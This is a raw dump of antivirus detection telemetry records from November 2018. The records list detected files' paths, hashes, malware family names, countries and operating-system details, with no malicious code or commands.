  Row(detection=Row(filename='82f026d9819428812a413f681f78d01f180017d6cc6f7040911a40feeddbcf69', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\82F026D9819428812A413F681F78D01F180017D6CC6F7040911A40FEEDDBCF69', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='82f026d9819428812a413f681f78d01f180017d6cc6f7040911a40feeddbcf69', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:20:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res0301_newmm[9].exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[9].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:26:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='keyboardtest.exe', filepath='\\\\?\\D:\\软件\\装机人员工具\\键盘测试\\KeyboardTest.exe', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='af9822f4f4a1a48fab984c353d3281a1c5e4ba839a414b377366c0c67b24a61d', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:30:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rddjvja', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$RDDJVJA', filesize=64000, name='VBA/Dldr.Agent.lvmvi.#M1.#R1'), hash='998e65594b9d27fccc5c02c2346d317f870b8424f2836edf14ad0efd1d19e70a', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T15:52:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='alaskan.vir', filepath='\\\\?\\C:\\Program Files\\Flipper\\alaskan.VIR', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='6aac33cc09101d1bfa9529c891b30cbb094736de5348a15f1b3031f2c7e026c1', metadata=Row(cmdline=None, country='ZA', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:27:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='microsoft office 2007 full serial __3108_il5153(1).exe', filepath='C:\\Users\\X\\Downloads\\Microsoft Office 2007 Full Serial __3108_il5153(1).exe', filesize=696000, name='ADWARE/Amonetize.Gen.#M300.#R6412'), hash='df264ecdbc5c8b21c86dc394ca14fc894c929b64a3bf1044ab777262d605189d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3231232, timestamp='2018-11-01T06:39:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111503-1980172f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111503-1980172F', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:14:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110212-b83ff9ca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110212-B83FF9CA', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:01:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='7a0d925adb32d50186e7ffa895079a1a7f69a169b71c5ece4a9197e634663ae4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\7A0D925ADB32D50186E7FFA895079A1A7F69A169B71C5ECE4A9197E634663AE4', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7a0d925adb32d50186e7ffa895079a1a7f69a169b71c5ece4a9197e634663ae4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:06:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='44f88818-da42-4e6f-a6e9-b52f4cc2f489.exe', filepath='F:\\{3c4d590c-7600-a744-32d0-5d0fe936f652}\\44f88818-da42-4e6f-a6e9-b52f4cc2f489.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='1ec36fc1bb6bce36dd3a82304be237919ede3e6b790b7a248c340042353b5bc0', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:25:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-112510-65293b2f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0e019a49\\AVSCAN-20181101-112136-4FA44243\\AVSCAN-20181101-112510-65293B2F', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T10:25:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-220754-96a4411a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b587aeee\\AVSCAN-20181101-220743-94BA7029\\AVSCAN-20181101-220754-96A4411A', filesize=3840000, name='HEUR/APC.Griffin.#M1.#R1'), hash='819ced6c2cbc5fbd4f91e5147b0753b8b98fcd55ce0fd31556ab04f14a9191a2', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:07:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-003258-7caa901f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-003258-7CAA901F', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:33:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-235949-a708dc5c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0dd13b79\\AVSCAN-20181101-235114-7A2EFC9A\\AVSCAN-20181101-235949-A708DC5C', filesize=720000, name='PUA/InstallCore.Gen.#M300.#R5961'), hash='4c5c004da602b9987c77d72298376c54115f60e08681f691396081a53216e2fb', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T15:59:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002904-63495349', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002904-63495349', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:29:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='csupdate.exe', filepath='D:\\PLAQUINHAS DIVERTIDAS\\PROGRAMAS\\acad2014 32bits\\x86\\RC2014\\Program Files\\Autodesk\\Autodesk ReCap\\csupdate.exe', filesize=192000, name='W32/Stanit.#M1.#R1'), hash='1c5848b14bc8ebb210f05417a14347591e0dc3b600a10a1afa49ad049f05a020', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:03:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T10:37:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.238\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.238\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T20:28:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-001408-990892cb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a430745e\\AVSCAN-20181102-001238-8DA6678E\\AVSCAN-20181102-001408-990892CB', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:14:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124748-bda2da48', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a10a9518\\AVSCAN-20181101-124611-B2786ED9\\AVSCAN-20181101-124748-BDA2DA48', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:47:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='129c87278ccf88c8d473234adad580110c32c77ace9bd7cd989d3aeae006bfb9', metadata=Row(cmdline=None, country='GA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T03:31:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cahelper.exe', filepath='C:\\Program Files (x86)\\FtcspBszsFreeGd\\plugins\\CAHelper\\CAHelper.exe', filesize=896000, name='TR/Spy.Gen.#M300.#R1153'), hash='31fe0201e7c0eee115267b1f3b157cef20f8b43659f6739da38ed1b6430f5c0e', metadata=Row(cmdline='silent', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\FtcspBszsFreeGd\\bin\\FTCSP.exe', parentsize=7746696, timestamp='2018-11-01T00:59:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-195501-9cd10123', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_17d74b9e\\AVSCAN-20181101-195354-9475B599\\AVSCAN-20181101-195501-9CD10123', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:55:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215015-02b0eaae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3342ce29\\AVSCAN-20181101-215001-001B0A69\\AVSCAN-20181101-215015-02B0EAAE', filesize=2560000, name='TR/Black.Gen2.#M1.#R1'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:50:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-091221-6087daa5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4bea89cb\\AVSCAN-20181102-091204-5E0B377C\\AVSCAN-20181102-091221-6087DAA5', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T22:12:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T13:10:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='savepass 1.1-bho64.dll', filepath='\\\\?\\C:\\Program Files (x86)\\SavePass 1.1\\SavePass 1.1-bho64.dll', filesize=940000, name='ADWARE/CrossRider.Gen.#M300.#R5892'), hash='15ee2676c95b45800892ec5873aee229893ff4d19cfd133f2e8e02683b37e2c7', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T15:00:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T07:09:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='41d45baa280502faf908e29209e80ab11f1431ca3f7408a908acfca907fc4e64', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T09:10:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='qsvg.dll', filepath='F:\\Users\\X\\AppData\\Local\\MEGAsync\\imageformats\\qsvg.dll', filesize=388000, name='W32/Ramnit.C.#M1.#R1'), hash='11ffb848625ae1641164eb1526715654940e1cdb61da6b680e6d38b074a91bdb', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=815256, timestamp='2018-11-01T10:34:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00001b31', filepath='C:\\Windows\\Temp\\tmp00000308\\tmp00001b31', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T13:40:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='namexif installer.exe', filepath='D:\\programme1\\Namexif Installer.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='23c596d914a6980cdef183c5a8e423a4efb60f697cd8157196ffd776ca1c5ba8', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Personal Backup 5\\Persbackup.exe', parentsize=10769920, timestamp='2018-11-01T21:00:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T10:00:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\xs3csegs0jo\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:41:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rcnpjjtj.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\rcnPJjTj.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='oss.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\SOCIO SANITARI\\OSS.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:13:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151544-416853d7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151544-416853D7', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:15:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='selezione del personale.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\COMUNICAZIONE\\SELEZIONE DEL PERSONALE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:22:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152356-4c0b1b71', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_642cd325\\AVSCAN-20181101-152303-41C8AB8B\\AVSCAN-20181101-152356-4C0B1B71', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='be458c71411a96a3c8b0e010203665e37b3ec2700f94c837e24d0cf7b63cb5e1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:23:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aidl.exe', filepath='K:\\TAB\\Lava_Iris_510\\Lava_Iris_510_INT_S102_20150429_(by_firmwarefile.com)\\Lava_Iris_510_INT_S102_20150429\\SN Write Tool v2.1444.00\\Android\\aidl.exe', filesize=1472000, name='W32/Sality.AT.#M1.#R1'), hash='ddb428e87495b8705bbd86f9e93c188e7cc9ca38b44e0b47b29b764ebb9da5f7', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-01T09:23:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='3286.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\3286.tmp', filesize=896000, name='TR/Crypt.XPACK.Gen4.#M300.#R300219'), hash='f1fdf5a690618f86263b03a073592cd58c12fbca0354d113ecb97bdfe419cc72', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:35:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hotel puri denpasar 17-19-2018.pif', filepath='F:\\Hotel Puri Denpasar 17-19-2018\\Hotel Puri Denpasar 17-19-2018.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T07:45:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-074553-6f2d8a67', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-074440-5F869C43\\AVSCAN-20181102-074553-6F2D8A67', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='d459c3ef5011147cda165096d073d3ff14cb504ed1abc1f88638508c4705b41c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:49:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213554-57429343', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-213554-57429343', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:36:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142629-71a245c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_81949114\\AVSCAN-20181101-085743-41FE8D83\\AVSCAN-20181101-142629-71A245C8', filesize=320000, name='HEUR/APC.#M1.#R1'), hash='e1e7c88cdfd27778cf4e4b7f08f96cc93f2931aa3a672ebd784a5065bf6a3548', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:26:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\gxd35humjx0\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='\\\\\\/h \\\\\\/shared Global\\\\\\\\1bb6c73d91ec41b082c3f2f3bafc2fa9', country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\WerFault.exe', parentsize=360448, timestamp='2018-11-01T17:16:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bhome3135.exe', filepath='D:\\Bo PM Phong Canh\\Du Lieu Cu truoc\\Chu 4 ngo\\gho\\du lieu o D\\soft\\ViRut\\BHome3135.exe', filesize=20992000, name='HEUR/AGEN.1006275.#M1.#R1'), hash='9adf698d3283bd72e49327542059c7dad7a59c3b2c32aa50d60d3155606b9719', metadata=Row(cmdline='-r', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Kaspersky Lab\\Kaspersky Anti-Virus 17.0.0\\avp.exe', parentsize=241544, timestamp='2018-11-01T07:57:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\oi4m0runfzb\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=18385368, timestamp='2018-11-01T14:19:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ee2458c6c993a22c14345156b4507aa4e0f61cd389d5fd517059aca024c8c1a6', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_26.10.2018-1.available\\Avira\\EE2458C6C993A22C14345156B4507AA4E0F61CD389D5FD517059ACA024C8C1A6', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='ee2458c6c993a22c14345156b4507aa4e0f61cd389d5fd517059aca024c8c1a6', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:50:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='dc86dd6c1b8d4af8cb1d2d250a3c78d9d21d5314f73bd753e4778c47942c098f', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T05:23:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sociosanitario.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI NUOVI DEFINIITIVI\\schede presentazione corsi\\schede ultime APRILE 2016\\sociosanitario.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:15:22Z'), dt=datetime.date(2018, 11, 1)),
